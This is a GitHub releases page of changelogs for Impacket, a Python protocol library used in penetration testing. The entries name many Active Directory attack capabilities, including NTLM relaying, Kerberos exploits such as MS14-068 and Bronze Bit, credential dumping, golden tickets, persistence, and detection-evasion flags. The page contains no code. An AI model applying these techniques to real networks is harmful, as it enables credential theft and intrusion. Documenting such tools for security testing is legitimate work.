        • Updated intro to not trigger the AV on windows (@mpgn)
      • ntlmrelayx.py:
        • Implemented RAW Relay Server (@CCob)
        • Added an LDAP attack dumping information about the domain's ADCS enrollment services (@SAERXCIT)
        • Added multi-relay feature to the HTTP Relay Server. Now one incoming HTTP connection could be used against multiple targets (@0xdeaddood)
        • Added an option to disable the multi-relay feature (@zblurx and @0xdeaddood)
        • Added multiple HTTP listeners running at the same time (@SAERXCIT)
        • Support for the ADCS ESC1 and ESC6 attacks (@hugo-syn)
        • Added Shadow Credentials attack (@ShutdownRepo, @Tw1sm, @nodauf and @p0dalirius)
        • Added the ability to define a password for the LDAP attack addComputer (@ShutdownRepo)
        • Added rename_computer and modify add_computer in LDAP interactive shell (@capnkrunchy)
        • Implemented StartTLS (@ThePirateWhoSmellsOfSunflowers)
      • reg.py:
        • Added save function to allow remote saving of registry hives (@ShutdownRepo and @scopedsecurity)
      • secretsdump.py:
        • Added an option to dump credentials using the Kerberos Key List attack (@0xdeaddood)
      • smbpasswd.py:
        • Added an option to force credentials change via injecting new values into SAM (@snovvcrash and @Alef-Burzmali!)
    3. New examples

      • machine_role.py: This script retrieves a host's role along with its primary domain details (@simondotsh)
      • keylistattack.py: This example implements the Kerberos Key List attack to dump credentials abusing RODCs and Azure AD Kerberos Servers (@0xdeaddood)

    As always, thanks a lot to all these contributors that make this library better every day (since last version):

    @rmaksimov @simondotsh @CCob @raithedavion @SAERXCIT @Maltemo @dirkjanm @reznok @ShutdownRepo @scopedsecurity @Tw1sm @nodauf @p0dalirius @zblurx @hugo-syn @capnkrunchy @mohemiv @mpgn @rtpt-jonaslieb @snovvcrash @Alef-Burzmali @ThePirateWhoSmellsOfSunflowers @jlvcm

    Source code(tar.gz)
    Source code(zip)
    impacket-0.10.0.tar.gz(1.37 MB)
  • impacket_0_9_24(Oct 27, 2021)

    Project's main page at https://www.secureauth.com/labs/open-source-tools/impacket/

    ChangeLog for 0.9.24:

    1. Library improvements

      • Fixed WMI objects parsing (@franferrax)
      • Added the RpcAddPrinterDriverEx method and related structures to [MS-RPRN]: Print System Remote Protocol (@cube0x0)
      • Initial implementation of [MS-PAR]: Print System Asynchronous Remote Protocol (@cube0x0)
      • Complying MS-RPCH with HTTP/1.1 (@mohemiv)
      • Added return of server time in case of Kerberos error (@ShutdownRepo and @Hackndo)
    2. Examples improvements

      • getST.py:
        • Added support for a custom additional ticket for S4U2Proxy (@ShutdownRepo)
      • ntlmrelayx.py:
        • Added Negotiate authentication support to the HTTP server (@LZD-TMoreggia)
        • Added anonymous session handling in the HTTP server (@0xdeaddood)
        • Fixed error in ldapattack.py when trying to escalate with machine account (@Rcarnus)
        • Added the implementation of AD CS attack (@ExAndroidDev)
        • Disabled the anonymous logon in the SMB server (@ly4k)
      • psexec.py:
        • Fixed decoding problems on multi bytes characters (@p0dalirius)
      • reg.py:
        • Implemented ADD and DELETE functionalities (@Gifts)
      • secretsdump.py:
        • Speeding up NTDS parsing (@skelsec)
      • smbclient.py:
        • Added 'mget' command which allows the download of multiple files (@deadjakk)
        • Handling empty search count in FindFileBothDirectoryInfo (@martingalloar)
      • smbpasswd.py:
        • Added the ability to change a user's password providing NTLM hashes (@snovvcrash)
      • smbserver.py:
        • Added NULL SMBv2 client connection handling (@0xdeaddood)
        • Hardened path checks and Added TID checks (@martingalloar)
        • Added SMB2 support to QUERY_INFO Request and Enabled SMB_COM_FLUSH method (@0xdeaddood)
        • Added missing constant and structure for the QUERY_FS Information Level SMB_QUERY_FS_DEVICE_INFO (@martingalloar)
      • wmipersist.py:
        • Fixed VBA script execution and improved error checking (@franferrax)
    3. New examples

      • rbcd.py: Example script for handling the msDS-AllowedToActOnBehalfOfOtherIdentity property of a target computer (@ShutdownRepo and @p0dalirius) (based on the previous work of @tothi and @NinjaStyle82)

    As always, thanks a lot to all these contributors that make this library better every day (since last version):

    @deadjakk @franferrax @cube0x0 @w0rmh013 @skelsec @mohemiv @LZD-TMoreggia @exploide @ShutdownRepo @Hackndo @snovvcrash @rmaksimov @Gifts @Rcarnus @ExAndroidDev @ly4k @p0dalirius

    Source code(tar.gz)
    Source code(zip)
    impacket-0.9.24.tar.gz(1.57 MB)
  • impacket_0_9_23(Jun 9, 2021)

    Project's main page at https://www.secureauth.com/labs/open-source-tools/impacket/

    ChangeLog for 0.9.23:

    1. Library improvements

      • Support connect timeout with SMBTransport (@vruello)
      • Speeding up DcSync (@mohemiv)
      • Fixed Python3 issue when serving SOCKS5 requests (@agsolino)
      • Moved docker container to Python 3.8 (@mgallo)
      • Added basic GitHub Actions workflow (@mgallo)
      • Fixed Path Traversal vulnerabilities in smbserver.py - CVE-2021-31800 (@omriinbar AppSec Researcher at CheckMarx)
      • Fixed POST request processing in httprelayserver.py (@Rcarnus)
      • Added cat command to smbclient.py (@mxrch)
      • Added new features to the LDAP Interactive Shell to facilitate AD exploitation (@AdamCrosser)
      • Python 3.9 support (@meeuw and @cclauss)
    2. Examples improvements

      • addcomputer.py:
        • Enable the machine account created via SAMR (@0xdeaddood)
      • getST.py:
        • Added exploit for CVE-2020-17049 - Kerberos Bronze Bit attack (@jakekarnes42)
        • Compute NTHash and AESKey for the Bronze Bit attack automatically (@snovvcrash)
      • ntlmrelayx.py:
        • Fixed target parsing error (@0xdeaddood)
      • wmipersist.py:
        • Fixed filterBinding error (@franferrax)
        • Added PowerShell option for semi-interactive shells in dcomexec.py, smbexec.py and wmiexec.py (@snovvcrash)
        • Added new parameter to select COMVERSION in dcomexec.py, wmiexec.py, wmipersist.py and wmiquery.py (@zexusx26)
    3. New examples

      • Get-GPPPassword.py: This example extracts and decrypts Group Policy Preferences passwords using streams for treating files instead of mounting shares. Additionally, it can parse GPP XML files offline (@ShutdownRepo and @p0dalirius)
      • smbpasswd.py: This script is an alternative to smbpasswd tool and intended to be used for changing expired passwords remotely over SMB (MSRPC-SAMR) (@snovvcrash)

    As always, thanks a lot to all these contributors that make this library better every day (since last version):

    @mpgn @vruello @mohemiv @jagotu @jakekarnes42 @snovvcrash @zexusx26 @omriinbar @Rcarnus @nuschpl @mxrch @ShutdownRepo @p0dalirius @AdamCrosser @franferrax @meeuw and @cclauss

    Source code(tar.gz)
    Source code(zip)
    impacket-0.9.23.tar.gz(1.32 MB)
  • impacket_0_9_22(Nov 23, 2020)

    Project's main page at https://www.secureauth.com/labs/impacket/

    ChangeLog for 0.9.22:

    1. Library improvements

      • Added implementation of RPC over HTTP v2 protocol (by @mohemiv).
      • Added MS-NSPI, MS-OXNSPI and MS-OXABREF protocol implementations (by @mohemiv).
      • Improved the multi-page results in LDAP queries (by @ThePirateWhoSmellsOfSunflowers).
      • NDR parser optimization (by @mohemiv).
      • Improved serialization of WMI method parameters (by @tshmul).
      • Introduce the MS-NLMP 2.2.2.10 VERSION structure in NTLMAuthNegotiate messages (by @franferrax).
      • Added some NETLOGON structs for NetrServerPasswordSet2 (by @dirkjanm).
      • Python 3.8 support.
    2. Examples improvements

      • atexec.py: Fixed after MS patches related to RPC attacks (by @mohemiv).
      • dpapi.py: Added -no-pass, pass-the-hash and AES Key support for backup subcommand.
      • GetNPUsers.py: Added ability to enumerate targets with Kerberos KRB5CC (by @rmaksimov).
      • GetUserSPNs.py: Added new features for kerberoasting (by @mohemiv).
      • ntlmrelayx.py:
        • Added ability to relay on new Windows versions that have SMB guest access disabled by default.
        • Added option to specify the NTLM Server Challenge used when receiving a connection.
        • Added relaying to RPC support (by @mohemiv).
        • Implemented WCFRelayServer (by @cnotin).
        • Added Zerologon DCSync Relay Client (by @dirkjanm).
        • Fixed issue in ldapattack.py when relaying and creating computer in CN=Computers (by @Hackndo).
      • rpcdump.py: Added RPC over HTTP v2 support (by @mohemiv).
      • secretsdump.py:
        • Added ability to specifically delete a shadow based on its ID (by @phefley).
        • Dump plaintext machine account password when dumping the local registry secrets(by @dirkjanm).
    3. New examples

      • exchanger.py: A tool for connecting to MS Exchange via RPC over HTTP v2 (by @mohemiv).
      • rpcmap.py: Scan for listening DCE/RPC interfaces (by @mohemiv).

    As always, thanks a lot to all these contributors that make this library better every day (since last version): @mohemiv @mpgn @Romounet @ThePirateWhoSmellsOfSunflowers @rmaksimov @fuzzKitty @tshmul @spinenkoia @AaronRobson @ABCIFOGeowi40 @cclauss @cnotin @5alt @franferrax @Dliv3 @dirkjanm @Mr-Gag @vbersier @phefley @Hackndo

    Source code(tar.gz)
    Source code(zip)
    impacket-0.9.22.tar.gz(1.30 MB)
  • impacket_0_9_21(Mar 26, 2020)

    Project's main page at www.secureauth.com

    ChangeLog for 0.9.21:

    1. Library improvements

      • New methods into CCache class to import/export kirbi (KRB-CRED) formatted tickets (by @Zer1t0).
      • Add FSCTL_SRV_ENUMERATE_SNAPSHOTS functionality to SMBConnection (by @rxwx).
      • Changes in NetBIOS classes in nmb.py (select() by poll() read from socket) (by @cnotin).
      • Timestamped logging added.
      • Interactive shell to perform LDAP operations (by @mlefebvre).
      • Added two DCE/RPC calls in tsch.py (by @mohemiv).
      • Single-source the version number and standardize on symantic + pre-release + local versioning (by @jsherwood0).
      • Added implementation for keytab files (by @kcirtapw).
      • Added SMB 3.1.1 support for Client SMB Connections.
    2. Examples improvements

      • smbclient.py: List the VSS snapshots for a specified path (by @rxwx).
      • GetUserSPNs.py: Added delegation information associated with accounts (by @G0ldenGunSec).
      • dpapi.py:
        • Added more functions to decrypt masterkeys based on SID + hashes/key. Also support supplying hashes instead of the password for decryption(by @dirkjanm).
        • Pass the hash support for backup key retrieval (by @imaibou).
        • Added feature to decrypt a user's masterkey using the MS-BKRP (by @imaibou).
      • raiseChild.py: Added a new flag to specify the RID of a user to dump credentials (by @0xdeaddood).
      • Added flags to bypass badly made detection use cases (by @MaxNad):
        • smbexec.py: Possibility to rename the PSExec uploaded binary name with the -remote-binary-name flag.
        • psexec.py: Possibility to use another service name with the -service-name flag.
      • ntlmrelayx.py:
        • Added a flag to use a SID as the escalate user for delegation attacks(by @0xe7).
        • Support for dumping LAPS passwords (by @praetorian-adam-crosser).
        • Added LDAP interactive mode that allow an attacker to manually perform basic operations like creating a new user, adding a user to a group , dump the AD, etc. (by @mlefebvre).
        • Support for multiple relays through one SMB connection (by @0xdeaddood).
        • Added support for dumping gMSA passwords (by @cube0x0).
      • ticketer.py: Added an option to use the SPNs keys from a keytab for a silver ticket.(by @kcirtapw)
    3. New Examples

      • addcomputer.py: Allows add a computer to a domain using LDAP or SAMR (SMB) (by @jagotu)
      • ticketConverter.py: This script converts kirbi files, commonly used by mimikatz, into ccache files used by Impacket, and vice versa (by @Zer1t0).
      • findDelegation.py: Simple script to quickly list all delegation relationships (unconstrained, constrained, resource-based constrained) in an AD environment (by @G0ldenGunSec).

    As always, thanks a lot to all these contributors that make this library better every day (since last version):

    @jagotu, @Zer1t0 ,@rxwx, @mpgn, @danhph, @awsmhacks, @slasyz, @cnotin, @exploide, @G0ldenGunSec, @dirkjanm, @0xdeaddood, @MaxNad, @imaibou, @BarakSilverfort, @0xe7, @mlefebvre, @rmaksimov, @praetorian-adam-crosser, @jsherwood0, @mohemiv, @justin-p, @cube0x0, @spinenkoia, @kcirtapw, @MrAnde7son, @fridgehead, @MarioVilas.

    Source code(tar.gz)
    Source code(zip)
    impacket-0.9.21.tar.gz(1.21 MB)
  • impacket_0_9_20(Sep 25, 2019)

    Project's main page at www.secureauth.com

    ChangeLog for 0.9.20:

    1. Library improvements

      • Python 3.6 support! This is the first release supporting Python 3.x so please issue tickets whenever you find something not working as expected. Libraries and examples should be fully functional.
      • Test coverage improvements by @infinnovation-dev
      • Anonymous SMB 2.x Connections are not encrypted anymore (by @cnotin)
      • Support for multiple PEKs when decrypting Windows 2016 DIT files (by @mikeryan)
    2. Examples improvements

      • ntlmrelayx.py:
        1. CVE-2019-1019: Bypass SMB singing for unpatched (by @msimakov)
        2. Added POC code for CVE-2019-1040 (by @dirkjanm)
        3. Added NTLM relays leveraging Webdav authentications (by @salu90)
    3. New Examples

      • kintercept.py: A tool for intercepting krb5 connections and for testing KDC handling S4U2Self with unkeyed checksum (by @iboukris)

    As always, thanks a lot to all these contributors that make this library better every day (since last version): @infinnovation-dev, @cnotin, @mikeryan, @SR4ven, @cclauss, @skorov, @msimakov, @dirkjanm, @franferrax, @iboukris, @n1ngod, @c0d3z3r0, @MrAnde7son.

    Source code(tar.gz)
    Source code(zip)
    impacket-0.9.20.tar.gz(3.69 MB)
  • impacket_0_9_19(Apr 1, 2019)

    Project's main page at www.secureauth.com

    ChangeLog for 0.9.19:

    1. Library improvements

      • [MS-EVEN] Interface implementation (Initial - by @MrAnde7son )
    2. Examples improvements

    As always, thanks a lot to all these contributors that make this library better every day (since last version): @dirkjanm, @MrAnde7son, @ibo, @franferrax, @Qwokka, @CaledoniaProject , @eladshamir, @Zer1t0, @martingalloar, @muizzk, @Petraea, @SR4ven, @Fist0urs, @Zer1t0

    Source code(tar.gz)
    Source code(zip)
    impacket-0.9.19.tar.gz(1.17 MB)
  • impacket_0_9_18(Dec 5, 2018)

    Project's main page at www.secureauth.com

    ChangeLog for 0.9.18:

    1. Library improvements

      • Replace unmaintained PyCrypto for pycryptodome (@dirkjanm)
      • Using cryptographically secure pseudo-random generators
      • Kerberos "no pre-auth and RC4" handling in GetKerberosTGT (by @qlemaire)
      • Test cases adjustments, travis and flake support (@cclauss)
      • Python3 test cases fixes (@eldipa)
      • Adding DPAPI / Vaults related structures and functions to decrypt secrets.
      • [MS-RPRN] Interface implementation (Initial)
    2. Examples improvements

      • ntlmrelayx.py: Optimize ACL enumeration and improve error handling in ntlmrelayx LDAP attack (by @dirkjanm)
      • secretsdump.py: Added dumping of machine account Kerberos keys (@dirkjanm). DPAPI_SYSTEM LSA Secret is now parsed and key contents are shown.
      • GetUserSPNs.py: Bugfixes and cross-domain support (@dirkjanm)
    3. New Examples

      • dpapi.py: Allows decrypting vaults, credentials and masterkeys protected by DPAPI. Domain backup key support added by @MrAnde7son

    As always, thanks a lot to all these contributors that make this library better every day (since last version): @dirkjanm, @MrAnde7son, @franferrax, @MrRobot86, @qlemaire, @cauan, @eldipa

    Source code(tar.gz)
    Source code(zip)
    impacket-0.9.18.tar.gz(1.16 MB)
  • impacket_0_9_17(May 30, 2018)

    Project's main page at www.coresecurity.com

    ChangeLog for 0.9.17:

    1. Library improvements

      • New [MS-PAC] Implementation.
      • LDAP engine: Added extensibleMatch string filter parsing, simple paging support and handling of unsolicited notification (by @kacpern)
      • ImpactDecoder: Add EAPOL, BOOTP and DHCP packet decoders (by Michael Niewoehner)
      • Kerberos engine: DES-CBC-MD5 support to kerberos added (by @skelsec)
      • SMB3 engine: If target server supports SMB >= 3, encrypt packets by default.
      • Initial [MS-DHCPM] and [MS-EVEN6] Interface implementation by @MrAnde7son
      • Major improvements to the NetBIOS layer. More use of structure.py in there.
      • MQTT Protocol Implementation and example.
      • Tox/Coverage Support added, test cases moved to its own directory. Major overhaul.
      • Many fixes and improvements in Kerberos, SMB and DCERPC (too much to name in a few lines).
    2. Examples improvements

      • GetUserSPNs.py: -request-user parameter added. Requests STs for the SPN associated to the user specified. Added support for AES Kerberoast tickets (by @elitest).
      • services.py: added port 139 support and related options (by @real-datagram).
      • samrdump.py: -csv switch to output format in CSV added.
      • ntlmrelayx.py: Major architecture overhaul. Now working mostly through dynamically loaded plugins. SOCKS proxy support for relayed connections. Specific attacks for every protocol and new protocols support (IMAP, POP3, SMTP). Awesome contributions by @dirkjanm.
      • secretsdump.py : AES(128) support for SAM hashes decryption. OldVal parameter dump added to LSA secrets dump (by @Ramzeth).
      • mssqlclient.py: Alternative method to execute cmd's on MSSQL (sp_start_job). (by @Kayzaks).
      • lsalookupsid.py: added no-pass and domain-users options (by @ropnop).
    3. New Examples

      • ticketer.py: Create Golden/Silver tickets from scratch or based on a template (legally requested from the KDC) allowing you to customize some of the parameters set inside the PAC_LOGON_INFO structure, in particular the groups, extrasids, duration, etc. Silver tickets creation by @machosec and @bransh.
      • GetADUsers.py: Gathers data about the domain's users and their corresponding email addresses. It will also include some extra information about last logon and last password set attributes.
      • getPac.py: Gets the PAC (Privilege Attribute Certificate) structure of the specified target user just having a normal authenticated user credentials. It does so by using a mix of [MS-SFU]'s S4USelf + User to User Kerberos Authentication.
      • getArch.py: Will connect against a target (or list of targets) machine/s and gather the OS architecture type installed by (ab)using a documented MSRPC feature.
      • mimikatz.py: Mini shell to control a remote mimikatz RPC server developed by @gentilkiwi.
      • sambaPipe.py: Will exploit CVE-2017-7494, uploading and executing the shared library specified by the user through the -so parameter.
      • dcomexec.py: A semi-interactive shell similar to wmiexec.py, but using different DCOM endpoints. Currently supports MMC20.Application, ShellWindows and ShellBrowserWindow objects. (contributions by @byt3bl33d3r).
      • getTGT.py: Given a password, hash or aesKey, this script will request a TGT and save it as ccache.
      • getST.py: Given a password, hash, aesKey or TGT in ccache, this script will request a Service Ticket and save it as ccache. If the account has constrained delegation (with protocol transition) privileges you will be able to use the -impersonate switch to request the ticket on behalf other user.

    As always, thanks a lot to all these contributors that make this library better every day (since last version): @dirkjanm, @real-datagram, @kacpern, @martinuy, @xelphene, @blark, @the-useless-one, @contactr2m, @droc, @martingalloar, @skelsec, @franferrax, @Fr0stbyt3, @ropnop, @MrAnde7son, @machosec, @federicoemartinez, @elitest, @symeonp, @Kanda-Motohiro, @Ramzeth, @mohemiv, @arch4ngel, @derekchentrendmicro, @Kayzaks, @donwayo, @bao7uo, @byt3bl33d3r, @xambroz, @luzpaz, @TheNaterz, @Mikkgn, @derUnbekannt.

    Source code(tar.gz)
    Source code(zip)
  • impacket_0_9_15(Jun 28, 2016)

    Project's main page at www.coresecurity.com

    ChangeLog for 0.9.15:

    1. Library improvements
    • SMB3.create(): define CreateContextsOffset and CreateContextsLength when applicable (by @rrerolle)
    • Retrieve user principal name from CCache file allowing to call any script with -k and just the target system (by @MrTchuss)
    • Packet fragmentation for DCE RPC layer mayor overhaul.
    • Improved pass-the-key attacks scenarios (by @skelsec)
    • Adding a minimalistic LDAP/s implementation (supports PtH/PtT/PtK). Only search is available (and you need to build the search filter yourself)
    • IPv6 improvements for DCERPC/LDAP and Kerberos
    1. Examples improvements
      • Adding -dc-ip switch to all examples. It allows to specify what the IP for the domain is. It assumes the DC and KDC resides in the same server
      • secretsdump.py
        • Adding support for Win2016 TP4 in LOCAL or -use-vss mode
        • Adding -just-dc-user switch to download just a single user data (DRSUAPI mode only)
        • Support for different ReplEpoch (DRSUAPI only)
        • pwdLastSet is also included in the output file
        • New structures/flags added for 2016 TP5 PAM support
      • wmiquery.py
        • Adding -rpc-auth-level switch (by @gadio)
      • smbrelayx.py
        • Added option to specify authentication status code to be sent to requesting client (by @mgeeky)
        • Added one-shot parameter. After successful authentication, only execute the attack once for each target (per protocol)
    2. New Examples
      • GetUserSPNs.py: This module will try to find Service Principal Names that are associated with normal user account. This is part of the kerberoast attack researched by Tim Medin (@timmedin)
      • ntlmrelayx.py: smbrelayx.py on steroids!. NTLM relay attack from/to multiple protocols (HTTP/SMB/LDAP/MSSQL/etc) (by @dirkjanm)
    Source code(tar.gz)
    Source code(zip)
    impacket-0.9.15.tar.gz(1.02 MB)
  • impacket_0_9_14(Jan 7, 2016)

    1. Library improvements:
      • [MS-TSCH] - ATSVC, SASec and ITaskSchedulerService Interface implementations
      • [MS-DRSR] - Directory Replication Service DRSUAPI Interface implementation
      • Network Data Representation (NDR) runtime overhaul. Big performance and reliability improvements achieved
      • Unicode support (optional) for the SMBv1 stack (by @rdubourguais)
      • NTLMv2 enforcement option on SMBv1 client stack (by @scriptjunkie)
      • Kerberos support for TDS (MSSQL)
      • Extended present flags support on RadioTap class
      • Old DCERPC runtime code removed
    2. Examples improvements:
      • mssqlclient.py: Added Kerberos authentication support
      • atexec.py: It now uses ITaskSchedulerService interface, adding support for Windows 2012 R2
      • smbrelayx.py:
        • If no file to upload and execute is specified (-E) it just dumps the target user's hashes by default
        • Added -c option to execute custom commands in the target (by @byt3bl33d3r)
      • secretsdump.py:
        • Active Directory hashes/Kerberos keys are dumped using [MS-DRSR]-(IDL_DRSGetNCChanges method) by default. VSS method is still available by using the -use-vss switch
        • Added -just-dc (Extract only NTDS.DIT NTLM Hashes and Kerberos) and -just-dc-ntlm ( only NTDS.DIT NTLM Hashes ) options
        • Added resume capability (only for NTDS in DRSUAPI mode) in case the connection drops. Use -resumefile option
        • Added Primary:CLEARTEXT Property from supplementalCredentials attribute dump
        • Add support for multiple password encryption keys (PEK) (by @s0crat)
      • goldenPac.py: Tests all DCs in domain and adding forest's enterprise admin group inside PAC
    3. New examples:
      • raiseChild.py: Child domain to forest privilege escalation exploit. Implements a child-domain to forest privilege escalation as detailed by Sean Metcalf (@PyroTek3) at https://adsecurity.org/?p=1640. It (ab)uses the concept of Golden Tickets and ExtraSids researched and implemented by Benjamin Delpy (@gentilkiwi) in mimikatz
      • netview.py: Gets a list of the sessions opened at the remote hosts and keep track of them (original idea by @mubix)
    Source code(tar.gz)
    Source code(zip)
    impacket-0.9.14.tar.gz(1013.87 KB)
  • impacket_0_9_13(May 4, 2015)

    May 2015 - 0.9.13:

    1. Library improvements
    • Kerberos support for SMB and DCERPC featuring:

      a. kerberosLogin() added to SMBConnection (all SMB versions). b. Support for RPC_C_AUTHN_GSS_NEGOTIATE at the DCERPC layer. This will negotiate Kerberos. This also includes DCOM. c. Pass-the-hash, pass-the-ticket and pass-the-key support. d. Ccache support, compatible with Kerberos utilities (kinit, klist, etc). e. Support for RC4, AES128_CTS_HMAC_SHA1_96 and AES256_CTS_HMAC_SHA1_96 ciphers. f. Support for RPC_C_AUTHN_LEVEL_PKT_PRIVACY/RPC_C_AUTHN_LEVEL_PKT_INTEGRITY.

    • SMB3 encryption support. Pycrypto experimental version that supports AES_CCM is required.

    • [MS-SAMR]: Supplemental Credentials support (used by secretsdump.py)

    • SMBSERVER improvements:

      a. SMB2 (2.002) dialect experimental support. b. Adding capability to export to John The Ripper format files

    • Library logging overhaul. Now there's a single logger called 'impacket'.

    1. Examples improvements:
    • Added Kerberos support to all modules (incl. pass-the-ticket/key)
    • Ported most of the modules to the new dcerpc.v5 runtime.
    • secretsdump.py: Added dumping Kerberos keys when parsing NTDS.DIT
    • smbserver.py: support for SMB2 (not enabled by default)
    • smbrelayx.py: Added support for MS15-027 exploitation.
    1. New examples:
    • goldenPac.py: MS14-068 exploit. Saves the golden ticket and also launches a psexec session at the target.
    • karmaSMB.py: SMB Server that answers specific file contents regardless of the SMB share and pathname requested.
    • wmipersist.py: Creates persistence over WMI. Adds/Removes WMI Event Consumers/Filters to execute VBS based on a WQL filter or timer specified.
    • netview.py: Gets a list of the sessions opened at the remote hosts looping over the hosts found keeping track of who logged in/out from remote servers
    Source code(tar.gz)
    Source code(zip)
    impacket-0.9.13.tar.gz(1018.32 KB)
Owner
SecureAuth Corporation
SecureAuth is an identity security company that enables the most secure and flexible authentication experience for employees, partners and customers.
SecureAuth Corporation
The Delegate Network: An Interactive Voice Response Delegative Democracy Implementation of Liquid Democracy

The Delegate Network Overview The delegate network is a completely transparent, easy-to-use and understand version of what is sometimes called liquid

James Bowery 2 Feb 25, 2022
A simple electrical network analyzer, BASED ON computer-aided design.

Electrical Network Analyzer A simple electrical network analyzer. Given the oriented graph of the electrical network (circut), BASED ON computer-aided

Ahmad Abdulrahman 4 Oct 15, 2022
Usbkill - an anti-forensic kill-switch that waits for a change on your USB ports and then immediately shuts down your computer.

Usbkill - an anti-forensic kill-switch that waits for a change on your USB ports and then immediately shuts down your computer.

Hephaestos 4.1k Dec 30, 2022
Godzilla traffic decoder Godzilla Decoder 是一个用于 哥斯拉Godzilla 加密流量分析的辅助脚本。

Godzilla Decoder 简介 Godzilla Decoder 是一个用于 哥斯拉Godzilla 加密流量分析的辅助脚本。 Godzilla Decoder 基于 mitmproxy,是mitmproxy的addon脚本。 目前支持 哥斯拉3.0.3 PhpDynamicPayload的

He Ruiliang 40 Dec 25, 2022
An advanced real time threat intelligence framework to identify threats and malicious web traffic on the basis of IP reputation and historical data.

ARTIF is a new advanced real time threat intelligence framework built that adds another abstraction layer on the top of MISP to identify threats and malicious web traffic on the basis of IP reputatio

CRED 225 Dec 31, 2022
Fast and configurable script to get and check free HTTP, SOCKS4 and SOCKS5 proxy lists from different sources and save them to files

Fast and configurable script to get and check free HTTP, SOCKS4 and SOCKS5 proxy lists from different sources and save them to files. It can also get geolocation for each proxy and check if proxies a

Almaz 385 Dec 31, 2022
Network-Shredder is a python based NIDS.

Network-Shredder is a python based NIDS.

Oussama RAHALI 9 Dec 13, 2022
DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.

What is DNSStager? DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS. DNSStager will create a malic

Askar 547 Dec 20, 2022
Python script to stop qBittorrent from torrenting without VPN for users with static IP.

Python script to stop qBittorrent from torrenting without VPN for users with static IP.

voidoak_ 1 Oct 25, 2021
Raspberry Pi Based Serial Console Server, with PushBullet Notification of IP changes, Automatic VPN termination, custom menu, Power Outlet Control, and a lot more

ConsolePi Acts as a serial Console Server, allowing you to remotely connect to ConsolePi via Telnet/SSH/bluetooth to gain Console Access to devices co

120 Jan 05, 2023
Pesquise, filtre e obtenha informações sobre animes. ( Módulo PIP )

Pesquise, filtre e obtenha informações sobre animes. ( Módulo PIP )

AimCaffe 3 Jan 30, 2022
Easily share folders between VMs.

This package aims to solve the problem of inter-VM file sharing (rather than manual copying) by allowing a VM to mount folders from any other VM's file system (or mounted network shares).

Rudd-O 12 Oct 17, 2022
Flashes keyboard leds on incoming/outgoing network packets

LED Net Capture Flashes keyboard leds on incoming/outgoing network packets Usage Requires root priviledges to run usage: ledcapture.py [-h] --keyboard

Dan Habot 56 Oct 27, 2022
🌐 Tools for Networking

🌐 Network Tools Tools for Networking This repository contains the tools needed to make networking easier. Make sure to download all of the requiremen

Tornaido 1 Jan 15, 2022
ARTEMIS: Real-Time Detection and Automatic Mitigation for BGP Prefix Hijacking.

ARTEMIS: Real-Time Detection and Automatic Mitigation for BGP Prefix Hijacking. This is the main ARTEMIS repository that composes artemis-frontend, artemis-backend, artemis-monitor and other needed c

INSPIRE Group @FORTH-ICS 273 Jan 01, 2023
Python 3.3+'s ipaddress for older Python versions

ipaddress Python 3.3+'s ipaddress for Python 2.6, 2.7, 3.2. This repository tracks the latest version from cpython, e.g. ipaddress from cpython 3.8 as

Philipp Hagemeister 103 Nov 11, 2022
MoreIP 一款基于Python的面向 MacOS/Linux 用户用于查询IP/域名信息的日常渗透小工具

MoreIP 一款基于Python的面向 MacOS/Linux 用户用于查询IP/域名信息的日常渗透小工具

xq17 9 Sep 21, 2022
A pure-Python KSUID implementation

Svix - Webhooks as a service Svix-KSUID This library is inspired by Segment's KSUID implementation: https://github.com/segmentio/ksuid What is a ksuid

Svix 83 Dec 16, 2022
BlueHawk is an HTTP/1.1 compliant web server developed in python

This project is done as a part of Computer Networks course. It aims at the implementation of the HTTP/1.1 Protocol based on RFC 2616 and includes the basic HTTP methods of GET, POST, PUT, DELETE and

2 Nov 11, 2022
Compare the contents of your hosted and proxy repositories for coordinate collisions

Nexus Repository Manager dependency/namespace confusion checker This repository contains a script to check if you have artifacts containing the same n

Sonatype Community 59 Mar 31, 2022